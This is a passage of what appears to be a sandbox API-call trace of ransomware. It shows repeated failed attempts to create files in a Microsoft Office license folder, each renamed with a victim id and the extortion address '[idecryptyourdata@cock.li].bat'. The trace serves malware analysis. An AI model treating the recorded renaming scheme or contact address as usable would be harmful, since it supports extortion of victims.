SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.420] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.420] CloseHandle (hObject=0x514) returned 1 [0162.421] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.421] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.421] CloseHandle (hObject=0x514) returned 1 [0162.422] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.422] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.423] CloseHandle (hObject=0x514) returned 1 [0162.424] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.424] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.424] CloseHandle (hObject=0x514) returned 1 [0162.425] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.426] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.426] CloseHandle (hObject=0x514) returned 1 [0162.427] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.427] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.431] CloseHandle (hObject=0x514) returned 1 [0162.432] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.432] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.432] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.433] CloseHandle (hObject=0x514) returned 1 [0162.433] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.434] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.434] CloseHandle (hObject=0x514) returned 1 [0162.435] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.436] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.436] CloseHandle (hObject=0x514) returned 1 [0162.437] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.438] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.438] CloseHandle (hObject=0x514) returned 1 [0162.439] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.439] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.440] CloseHandle (hObject=0x514) returned 1 [0162.441] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.441] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.442] CloseHandle (hObject=0x514) returned 1 [0162.443] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.443] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.444] CloseHandle (hObject=0x514) returned 1 [0163.097] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.097] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.097] CloseHandle (hObject=0x50c) returned 1 [0163.098] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.098] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.099] CloseHandle (hObject=0x50c) returned 1 [0163.099] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.099] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.100] CloseHandle (hObject=0x50c) returned 1 [0163.100] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.101] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.101] CloseHandle (hObject=0x50c) returned 1 [0163.102] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.102] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.103] CloseHandle (hObject=0x50c) returned 1 [0163.103] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.103] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.104] CloseHandle (hObject=0x50c) returned 1 [0163.104] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.104] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.105] CloseHandle (hObject=0x50c) returned 1 [0163.105] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.106] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.106] CloseHandle (hObject=0x50c) returned 1 [0163.107] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.107] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.107] CloseHandle (hObject=0x50c) returned 1 [0163.108] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.108] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.108] CloseHandle (hObject=0x50c) returned 1 [0163.109] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.109] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.109] CloseHandle (hObject=0x50c) returned 1 [0163.110] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.110] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.110] CloseHandle (hObject=0x50c) returned 1 [0163.111] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.111] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.112] CloseHandle (hObject=0x50c) returned 1 [0163.112] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.113] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.113] CloseHandle (hObject=0x50c) returned 1 [0163.114] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.114] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.114] CloseHandle (hObject=0x50c) returned 1 [0163.115] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.115] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.115] CloseHandle (hObject=0x50c) returned 1 [0163.116] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.116] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.116] CloseHandle (hObject=0x50c) returned 1 [0163.116] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.116] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 